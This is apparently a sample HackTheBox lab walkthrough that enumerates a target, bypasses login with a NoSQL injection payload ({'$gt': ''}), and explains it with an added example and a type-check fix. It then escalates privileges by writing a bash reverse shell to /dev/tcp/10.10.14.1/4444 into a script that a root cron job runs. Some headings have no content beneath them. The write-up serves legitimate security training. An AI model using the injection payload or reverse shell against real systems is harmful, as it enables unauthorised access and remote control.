Sample HackTheBox Machine Walkthrough
- Name: Sample Machine
- IP: 10.10.10.10
- OS: Linux
- Difficulty: Medium
Initial Enumeration
Started with a full port scan:
```bash
nmap -sV -sC -p- 10.10.10.10
```
Open Ports
- 22/tcp: SSH
- 80/tcp: HTTP
- 443/tcp: HTTPS
- 3306/tcp: MySQL
Web Enumeration
Found a web application running on port 80:
```bash
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt
```
Discovered Endpoints
Exploitation
Found a vulnerable API endpoint:
```python
import requests
import json

url = "http://10.10.10.10/api/v1/users"
headers = {
    "Content-Type": "application/json"
}
# The password field carries a query operator object instead of a string.
data = {
    "username": "admin",
    "password": {"$gt": ""}
}

# Send the body as JSON so the server parses the operator as an object.
response = requests.post(url, headers=headers, data=json.dumps(data))
print(response.text)
```
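Why the `{"$gt": ""}` password value in the request above is accepted, and the type check that stops it, shown as an added example (not code from this machine or the original walkthrough). It assumes a MongoDB-style backend, which the page does not name; `matches`, `find_user`, the two login functions and the user record are constructed for illustration.

```python
# Added illustration: toy stand-in for a MongoDB-style filter match.
# All names and the user record below are constructed for this example.
OPERATORS = {"$gt": lambda a, b: a > b, "$ne": lambda a, b: a != b}

USERS = [{"username": "admin", "password": "constructed-sample-secret"}]


def matches(stored, condition):
    """Equality for scalars; a non-empty dict is read as query operators."""
    if isinstance(condition, dict) and condition:
        return all(
            op in OPERATORS and OPERATORS[op](stored, arg)
            for op, arg in condition.items()
        )
    return stored == condition


def find_user(username, password):
    for user in USERS:
        if matches(user["username"], username) and matches(user["password"], password):
            return user
    return None


def login_vulnerable(body):
    # Parsed JSON goes straight into the filter, so a dict becomes an operator.
    return find_user(body.get("username"), body.get("password")) is not None


def login_hardened(body):
    # Reject anything that is not a plain string before it reaches the query.
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        raise ValueError("credential fields must be strings")
    return find_user(username, password) is not None


if __name__ == "__main__":
    payload = {"username": "admin", "password": {"$gt": ""}}  # value from the request above
    print("vulnerable:", login_vulnerable(payload))
    try:
        login_hardened(payload)
    except ValueError as exc:
        print("hardened: rejected,", exc)
```

A real deployment should also store a password hash and compare it in application code rather than inside the query.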
Privilege Escalation
After gaining initial access, found a cron job running as root:
Exploiting the Cron Job
```bash
echo 'bash -i >& /dev/tcp/10.10.14.1/4444 0>&1' > /tmp/exploit.sh
chmod +x /tmp/exploit.sh
```
Root Access
Successfully gained root access and found the root flag:
Lessons Learned
- Always check for NoSQL injection vulnerabilities
- Monitor cron jobs for privilege escalation opportunities
- Don’t forget to check for misconfigured services